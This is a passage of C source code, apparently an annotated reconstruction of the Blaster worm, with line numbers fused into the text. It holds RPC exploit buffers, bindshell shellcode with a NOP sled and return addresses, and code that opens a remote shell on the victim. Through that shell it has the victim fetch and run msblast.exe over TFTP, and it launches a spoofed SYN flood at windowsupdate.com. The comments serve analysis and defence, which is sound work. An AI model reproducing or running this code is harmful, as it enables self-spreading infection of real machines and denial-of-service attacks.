1547,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
1548
1549
1550
1551,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
1552
1553
1554
1555
1556
1557unsigned char sc[]=
1558
1559"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
1560
1561"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
1562
1563"\x46\x00\x58\x00\x46\x00\x58\x00"
1564
1565
1566
1567"\xff\xff\xff\xff" /* return address */
1568
1569
1570
1571"\xcc\xe0\xfd\x7f" /* primary thread data block */
1572
1573"\xcc\xe0\xfd\x7f" /* primary thread data block */
1574
1575
1576
1577/* port 4444 bindshell */
1578
1579"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1580
1581"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1582
1583"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1584
1585"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1586
1587"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1588
1589"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1590
1591"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1592
1593"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1594
1595"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1596
1597"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
1598
1599"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
1600
1601"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
1602
1603"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
1604
1605"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
1606
1607"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
1608
1609"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
1610
1611"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
1612
1613"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
1614
1615"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
1616
1617"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
1618
1619"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
1620
1621"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
1622
1623"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
1624
1625"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
1626
1627"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
1628
1629"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
1630
1631"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
1632
1633"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
1634
1635"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
1636
1637"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
1638
1639"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
1640
1641"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
1642
1643"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
1644
1645"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
1646
1647"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
1648
1649"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
1650
1651"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
1652
1653"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
1654
1655"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
1656
1657"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
1658
1659"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
1660
1661"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
1662
1663
1664
1665
1666
1667
1668
1669unsigned char request4[]={
1670
16710x01,0x10
1672
1673,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
1674
1675
1676
1677,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
1678
1679
1680
1681,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
1682
1683};
1684
1685
1686
1687int ThreadId;
1688
1689int len;
1690
1691int sizeof_sa;
1692
1693int ret;
1694
1695int opt;
1696
1697void *hThread;
1698
1699struct sockaddr_in target_ip;
1700
1701struct sockaddr_in sa;
1702
1703int fd;
1704
1705char cmdstr[0x200];
1706
1707int len1;
1708
1709unsigned char buf2[0x1000];
1710
1711int i;
1712
1713
1714
1715/*
1716
1717* Turn off non-blocking (i.e. re-enable blocking mode)
1718
1719* DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc')
1720
1721* will slow down the spread of this worm. It takes a long
1722
1723* time for blocking calls to timeout. I had several
1724
1725* thousand worms halted by my 'deredoc' tarpit.
1726
1727*/
1728
1729opt = 0;
1730
1731ioctlsocket(sock, FIONBIO , &opt);
1732
1733
1734
1735/*
1736
1737* Choose whether the exploit targets Win2k or WinXP.
1738
1739*/
1740
1741if (winxp1_or_win2k2 == 1)
1742
1743ret = 0x100139d;
1744
1745else
1746
1747ret = 0x18759f;
1748
1749memcpy(sc+36, (unsigned char *) &ret, 4);
1750
1751
1752
1753/* ----------------------------------------------
1754
1755* This section is just copied from the original exploit
1756
1757* script. This is the same as the scripts that have been
1758
1759* widely published on the Internet. */
1760
1761len=sizeof(sc);
1762
1763memcpy(buf2,request1,sizeof(request1));
1764
1765len1=sizeof(request1);
1766
1767
1768
1769*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
1770
1771*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
1772
1773
1774
1775memcpy(buf2+len1,request2,sizeof(request2));
1776
1777len1=len1+sizeof(request2);
1778
1779memcpy(buf2+len1,sc,sizeof(sc));
1780
1781len1=len1+sizeof(sc);
1782
1783memcpy(buf2+len1,request3,sizeof(request3));
1784
1785len1=len1+sizeof(request3);
1786
1787memcpy(buf2+len1,request4,sizeof(request4));
1788
1789len1=len1+sizeof(request4);
1790
1791
1792
1793*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
1794
1795
1796
1797
1798
1799*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
1800
1801*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
1802
1803*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
1804
1805*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
1806
1807*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
1808
1809*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
1810
1811*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
1812
1813
1814
1815if (send(sock,bindstr,sizeof(bindstr),0)== -1)
1816
1817{
1818
1819//perror("- Send");
1820
1821return;
1822
1823}
1824
1825
1826
1827
1828
1829if (send(sock,buf2,len1,0)== -1)
1830
1831{
1832
1833//perror("- Send");
1834
1835return;
1836
1837}
1838
1839closesocket(sock);
1840
1841Sleep(400);
1842
1843/* ----------------------------------------------*/
1844
1845
1846
1847
1848
1849/*
1850
1851* This section of code connects to the victim on port 4444.
1852
1853* DEFENSE : This means you can block this worm by blocking
1854
1855* TCP port 4444.
1856
1857* FAQ: This port is only open for the brief instant needed
1858
1859* to exploit the victim. Therefore, you can't scan for
1860
1861* port 4444 in order to find Blaster victims.
1862
1863*/
1864
1865if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)
1866
1867return;
1868
1869memset(&target_ip, 0, sizeof(target_ip));
1870
1871target_ip.sin_family = AF_INET;
1872
1873target_ip.sin_port = htons(SHELL_PORT_4444);
1874
1875target_ip.sin_addr.s_addr = inet_addr(victim_ip);
1876
1877if (target_ip.sin_addr.s_addr == SOCKET_ERROR)
1878
1879return;
1880
1881if (connect(fd, (struct sockaddr*)&target_ip,
1882
1883sizeof(target_ip)) == SOCKET_ERROR)
1884
1885return;
1886
1887
1888
1889/*
1890
1891* This section recreates the IP address from whatever IP
1892
1893* address this successfully connected to. In practice,
1894
1895* the strings "victim_ip" and "target_ip_string" should be
1896
1897* the same.
1898
1899*/
1900
1901memset(target_ip_string, 0, sizeof(target_ip_string));
1902
1903sizeof_sa = sizeof(sa);
1904
1905getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa);
1906
1907sprintf(target_ip_string, "%d.%d.%d.%d",
1908
1909sa.sin_addr.s_net, sa.sin_addr.s_host,
1910
1911sa.sin_addr.s_lh, sa.sin_addr.s_impno);
1912
1913
1914
1915/*
1916
1917* This section creates a temporary TFTP service that is
1918
1919* ONLY alive during the period of time that the victim
1920
1921* needs to download.
1922
1923* FAQ: You can't scan for TFTP in order to find Blaster
1924
1925* victims because the port is rarely open.
1926
1927*/
1928
1929if (fd_tftp_service)
1930
1931closesocket(fd_tftp_service);
1932
1933hThread = CreateThread(0,0,
1934
1935blaster_tftp_thread,0,0,&ThreadId);
1936
1937Sleep(80); /*give time for thread to start*/
1938
1939
1940
1941/*
1942
1943* This sends the command
1944
1945* tftp -i 1.2.3.4 GET msblast.exe
1946
1947* to the victim. The "tftp.exe" program is built into
1948
1949* Windows. It's intended purpose is to allow users to
1950
1951* manually update their home wireless access points with
1952
1953* new software (and other similar tasks). However, it is
1954
1955* not intended as a generic file-transfer protocol (it
1956
1957* stands for "trivial-file-transfer-protocol" -- it is
1958
1959* intended for only trivial tasks). Since a lot of hacker
1960
1961* exploits use the "tftp.exe" program, a good hardening
1962
1963* step is to remove/rename it.
1964
1965*/
1966
1967sprintf(cmdstr, "tftp -i %s GET %s\n",
1968
1969target_ip_string, MSBLAST_EXE);
1970
1971if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
1972
1973goto closesocket_and_return;
1974
1975
1976
1977/*
1978
1979* Wait 21 seconds for the victim to request the file, then
1980
1981* for the file to be delivered via TFTP.
1982
1983*/
1984
1985Sleep(1000);
1986
1987for (i=0; i<10 && is_tftp_running; i++)
1988
1989Sleep(2000);
1990
1991
1992
1993/*
1994
1995* Assume the the transfer is successful, and send the
1996
1997* command to start executing the newly downloaded program.
1998
1999* BUFORD: The hacker starts this twice. Again, it
2000
2001* demonstrates a lock of confidence, so he makes sure it's
2002
2003* started by doing it twice in slightly different ways.
2004
2005* Note that the "BILLY" mutex will prevent from actually
2006
2007* running twice.
2008
2009*/
2010
2011sprintf(cmdstr, "start %s\n", MSBLAST_EXE);
2012
2013if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
2014
2015goto closesocket_and_return;
2016
2017Sleep(2000);
2018
2019sprintf(cmdstr, "%s\n", MSBLAST_EXE);
2020
2021send(fd, cmdstr, strlen(cmdstr), 0);
2022
2023Sleep(2000);
2024
2025
2026
2027
2028
2029/*
2030
2031* This section closes the things started in this procedure
2032
2033*/
2034
2035closesocket_and_return:
2036
2037
2038
2039/* Close the socket for the remote command-prompt that has
2040
2041* been established to the victim. */
2042
2043if (fd != 0)
2044
2045closesocket(fd);
2046
2047
2048
2049/* Close the TFTP server that was launched above. As noted,
2050
2051* this means that the TFTP service is not running most of
2052
2053* the time, so it's not easy to scan for infected systems.
2054
2055*/
2056
2057if (is_tftp_running) {
2058
2059TerminateThread(hThread,0);
2060
2061closesocket(fd_tftp_service);
2062
2063is_tftp_running = 0;
2064
2065}
2066
2067CloseHandle(hThread);
2068
2069}
2070
2071
2072
2073
2074
2075/**
2076
2077* Convert the name into an IP address. If the IP address
2078
2079* is formatted in decimal-dot-notation (e.g. 192.2.0.43),
2080
2081* then return that IP address, otherwise do a DNS lookup
2082
2083* on the address. Note that in the case of the worm,
2084
2085* it always gives the string "windowsupdate.com" to this
2086
2087* function, and since Microsoft turned off that name,
2088
2089* the DNS lookup will usually fail, so this function
2090
2091* generally returns -1 (SOCKET_ERROR), which means the
2092
2093* address 255.255.255.255.
2094
2095*/
2096
2097int blaster_resolve_ip(const char *windowsupdate_com)
2098
2099{
2100
2101int result;
2102
2103
2104
2105result = inet_addr(windowsupdate_com);
2106
2107if (result == SOCKET_ERROR) {
2108
2109HOSTENT *p_hostent = gethostbyname(windowsupdate_com);
2110
2111if (p_hostent == NULL)
2112
2113result = SOCKET_ERROR;
2114
2115else
2116
2117result = *p_hostent->h_addr;
2118
2119}
2120
2121
2122
2123return result;
2124
2125}
2126
2127
2128
2129
2130
2131/*
2132
2133* This thre
2134
2135*/
2136
2137ULONG WINAPI blaster_DoS_thread(LPVOID p)
2138
2139{
2140
2141int opt = 1;
2142
2143int fd;
2144
2145int target_ip;
2146
2147
2148
2149
2150
2151/* Lookup the domain-name. Note that no checking is done
2152
2153* to ensure that the name is valid. Since Microsoft turned
2154
2155* this off in their domain-name servers, this function now
2156
2157* returns -1. */
2158
2159target_ip = blaster_resolve_ip("windowsupdate.com");
2160
2161
2162
2163
2164
2165/* Create a socket that the worm will blast packets at
2166
2167* Microsoft from. This is what is known as a "raw" socket.
2168
2169* So-called "raw-sockets" are ones where packets are
2170
2171* custom-built by the programmer rather than by the TCP/IP
2172
2173* stack. Note that raw-sockets were not available in Windows
2174
2175* until Win2k. A cybersecurity pundit called Microsoft
2176
2177* "irresponsible" for adding them.
2178
2179* 
2180
2181* That's probably an
2182
2183* unfairly harsh judgement (such sockets are available in
2184
2185* every other OS), but it's true that it puts the power of
2186
2187* SYNflood attacks in the hands of lame worm writers. While
2188
2189* the worm-writer would probably have chosen a different
2190
2191* DoS, such as Slammer-style UDP floods, it's likely that
2192
2193* Buford wouldn't have been able to create a SYNflood if
2194
2195* raw-sockets had not been added to Win2k/WinXP. */
2196
2197fd = WSASocket(
2198
2199AF_INET, /*TCP/IP sockets*/
2200
2201SOCK_RAW, /*Custom TCP/IP headers*/
2202
2203IPPROTO_RAW,
2204
2205NULL,
2206
22070,
2208
2209WSA_FLAG_OVERLAPPED
2210
2211);
2212
2213if (fd == SOCKET_ERROR)
2214
2215return 0;
2216
2217
2218
2219/* Tell the raw-socket that IP headers will be created by the
2220
2221* programmer rather than the stack. Most raw sockets in
2222
2223* Windows will also have this option set. */
2224
2225if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL,
2226
2227(char*)&opt, sizeof(opt)) == SOCKET_ERROR)
2228
2229return 0;
2230
2231
2232
2233
2234
2235/* Now do the SYN flood. The worm writer decided to flood
2236
2237* slowly by putting a 20-millisecond delay between packets
2238
2239* -- causing only 500 packets/second, or roughly, 200-kbps.
2240
2241* There are a couple of reasons why the hacker may have
2242
2243* chosen this.
2244
2245* 1. SYNfloods are not intended to be bandwidth floods,
2246
2247* even slow rates are hard to deal with.
2248
2249* 2. Slammer DoSed both the sender and receiver, therefore
2250
2251* senders hunted down infected systems and removed
2252
2253* them. This won't DoS the sender, so people are more
2254
2255* likely not to care about a few infected machines.
2256
2257*/
2258
2259for (;;) {
2260
2261blaster_send_syn_packet(target_ip, fd);
2262
2263
2264
2265/* Q: How fast does it send the SYNflood?
2266
2267* A: About 50 packets/second, where each packet is
2268
2269* 320-bits in size, for a total of 15-kbps.
2270
2271* It means that Buford probably intended for
2272
2273* dialup users to be a big source of the DoS
2274
2275* attack. He was smart enough to realize that
2276
2277* faster floods would lead to users discovering
2278
2279* the worm and turning it off. */
2280
2281Sleep(20);
2282
2283}
2284
2285
2286
2287
2288
2289closesocket(fd);
2290
2291return 0;
2292
2293}
2294
2295
2296
2297
2298
2299
2300
2301/*
2302
2303* This is a standard TCP/IP checksum algorithm
2304
2305* that you find all over the web.
2306
2307*/
2308
2309int blaster_checksum(const void *bufv, int length)
2310
2311{
2312
2313const unsigned short *buf = (const unsigned short *)bufv;
2314
2315unsigned long result = 0;
2316
2317
2318
2319while (length > 1) {
2320
2321result += *(buf++);
2322
2323length -= sizeof(*buf);
2324
2325}
2326
2327if (length) result += *(unsigned char*)buf;
2328
2329result = (result >> 16) + (result & 0xFFFF);
2330
2331result += (result >> 16);
2332
2333result = (~result)&0xFFFF;
2334
2335
2336
2337return (int)result;
2338
2339}
2340
2341
2342
2343
2344
2345
2346
2347/*
2348
2349* This is a function that uses "raw-sockets" in order to send
2350
2351* a SYNflood at the victim, which is "windowsupdate.com" in
2352
2353* the case of the Blaster worm.
2354
2355*/
2356
2357void blaster_send_syn_packet(int target_ip, int fd)
2358
2359{
2360
2361
2362
2363struct IPHDR
2364
2365{
2366
2367unsigned char verlen; /*IP version & length */
2368
2369unsigned char tos; /*IP type of service*/
2370
2371unsigned short totallength;/*Total length*/
2372
2373unsigned short id; /*Unique identifier */
2374
2375unsigned short offset; /*Fragment offset field*/
2376
2377unsigned char ttl; /*Time to live*/
2378
2379unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/
2380
2381unsigned short checksum; /*IP checksum*/
2382
2383unsigned int srcaddr; /*Source address*/
2384
2385unsigned int dstaddr; /*Destination address*/
2386
2387
2388
2389};
2390
2391struct TCPHDR
2392
2393{
2394
2395unsigned short srcport;
2396
2397unsigned short dstport;
2398
2399unsigned int seqno;
2400
2401unsigned int ackno;
2402
2403unsigned char offset;
2404
2405unsigned char flags;
2406
2407unsigned short window;
2408
2409unsigned short checksum;
2410
2411unsigned short urgptr;
2412
2413};
2414
2415struct PSEUDO
2416
2417{
2418
2419unsigned int srcaddr;
2420
2421unsigned int dstaddr;
2422
2423unsigned char padzero;
2424
2425unsigned char protocol;
2426
2427unsigned short tcplength;
2428
2429};
2430
2431struct PSEUDOTCP
2432
2433{
2434
2435unsigned int srcaddr;
2436
2437unsigned int dstaddr;
2438
2439unsigned char padzero;
2440
2441unsigned char protocol;
2442
2443unsigned short tcplength;
2444
2445struct TCPHDR tcphdr;
2446
2447};
2448
2449
2450
2451
2452
2453
2454
2455
2456
2457char spoofed_src_ip[16];
2458
2459unsigned short target_port = 80; /*SYNflood web servers*/
2460
2461struct sockaddr_in to;
2462
2463struct PSEUDO pseudo;
2464
2465char buf[60] = {0};
2466
2467struct TCPHDR tcp;
2468
2469struct IPHDR ip;
2470
2471int source_ip;
2472
2473
2474
2475
2476
2477/* Yet another randomizer-seeding */
2478
2479srand(GetTickCount());
2480
2481
2482
2483/* Generate a spoofed source address that is local to the
2484
2485* current Class B subnet. This is pretty smart of Buford.
2486
2487* Using just a single IP address allows defenders to turn
2488
2489* it off on the firewall, whereas choosing a completely
2490
2491* random IP address would get blocked by egress filters
2492
2493* (because the source IP would not be in the proper range).
2494
2495* Randomly choosing nearby IP addresses it probably the
2496
2497* best way to evade defenses */
2498
2499sprintf(spoofed_src_ip, "%i.%i.%i.%i",
2500
2501local_class_a, local_class_b, rand()%255, rand()%255);
2502
2503source_ip = blaster_resolve_ip(spoofed_src_ip);
2504
2505
2506
2507/* Build the sockaddr_in structure. Normally, this is what
2508
2509* the underlying TCP/IP stack uses to build the headers
2510
2511* from. However, since the DoS attack creates its own
2512
2513* headers, this step is largely redundent. */
2514
2515to.sin_family = AF_INET;
2516
2517to.sin_port = htons(target_port); /*this makes no sense */
2518
2519to.sin_addr.s_addr = target_ip;
2520
2521
2522
2523/* Create the IP header */
2524
2525ip.verlen = 0x45;
2526
2527ip.totallength = htons(sizeof(ip) + sizeof(tcp));
2528
2529ip.id = 1;
2530
2531ip.offset = 0;
2532
2533ip.ttl = 128;
2534
2535ip.protocol = IPPROTO_TCP;
2536
2537ip.checksum = 0; /*for now, set to true value below */
2538
2539ip.dstaddr = target_ip;
2540
2541
2542
2543/* Create the TCP header */
2544
2545tcp.dstport = htons(target_port);
2546
2547tcp.ackno = 0;
2548
2549tcp.offset = (unsigned char)(sizeof(tcp)<<4);
2550
2551tcp.flags = 2; /*TCP_SYN*/
2552
2553tcp.window = htons(0x4000);
2554
2555tcp.urgptr = 0;
2556
2557tcp.checksum = 0; /*for now, set to true value below */
2558
2559
2560
2561/* Create pseudo header (which copies portions of the IP
2562
2563* header for TCP checksum calculation).*/
2564
2565pseudo.dstaddr = ip.dstaddr;
2566
2567pseudo.padzero = 0;
2568
2569pseudo.protocol = IPPROTO_TCP;
2570
2571pseudo.tcplength = htons(sizeof(tcp));
2572
2573
2574
2575/* Use the source adress chosen above that is close, but
2576
2577* not the same, as the spreader's IP address */
2578
2579ip.srcaddr = source_ip;
2580
2581
2582
2583/* Choose a random source port in the range [1000-19999].*/
2584
2585tcp.srcport = htons((unsigned short)((rand()%1000)+1000));
2586
2587
2588
2589/* Choose a random sequence number to start the connection.
2590
2591* BUG: Buford meant htonl(), not htons(), which means seqno
2592
2593* will be 15-bits, not 32-bits, i.e. in the range
2594
2595* [0-32767]. (the Windows rand() function only returns
2596
2597* 15-bits). */
2598
2599tcp.seqno = htons((unsigned short)((rand()<<16)|rand()));
2600
2601
2602
2603pseudo.srcaddr = source_ip;
2604
2605
2606
2607/* Calculate TCP checksum */
2608
2609memcpy(buf, &pseudo, sizeof(pseudo));
2610
2611memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp));
2612
2613tcp.checksum = blaster_checksum(buf,
2614
2615sizeof(pseudo)+sizeof(tcp));
2616
2617
2618
2619memcpy(buf, &ip, sizeof(ip));
2620
2621memcpy(buf+sizeof(ip), &tcp, sizeof(tcp));
2622
2623
2624
2625/* I have no idea what's going on here. The assembly code
2626
2627* zeroes out a bit of memory near the buffer. I don't know
2628
2629* if it is trying to zero out a real variable that happens
2630
2631* to be at the end of the buffer, or if it is trying to zero
2632
2633* out part of the buffer itself. */
2634
2635memset(buf+sizeof(ip)+sizeof(tcp), 0,
2636
2637sizeof(buf)-sizeof(ip)-sizeof(tcp));
2638
2639
2640
2641/* Major bug here: the worm writer incorrectly calculates the
2642
2643* IP checksum over the entire packet. This is incorrect --
2644
2645* the IP checksum is just for the IP header itself, not for
2646
2647* the TCP header or data. However, Windows fixes the checksum
2648
2649* anyway, so the bug doesn't appear in the actual packets
2650
2651* themselves.
2652
2653*/
2654
2655ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp));
2656
2657
2658
2659/* Copy the header over again. The reason for this is simply to
2660
2661* copy over the checksum that was just calculated above, but
2662
2663* it's easier doing this for the programmer rather than
2664
2665* figuring out the exact offset where the checksum is
2666
2667* located */
2668
2669memcpy(buf, &ip, sizeof(ip));
2670
2671
2672
2673/* Send the packet */
2674
2675sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0,
2676
2677(struct sockaddr*)&to, sizeof(to));
2678
2679}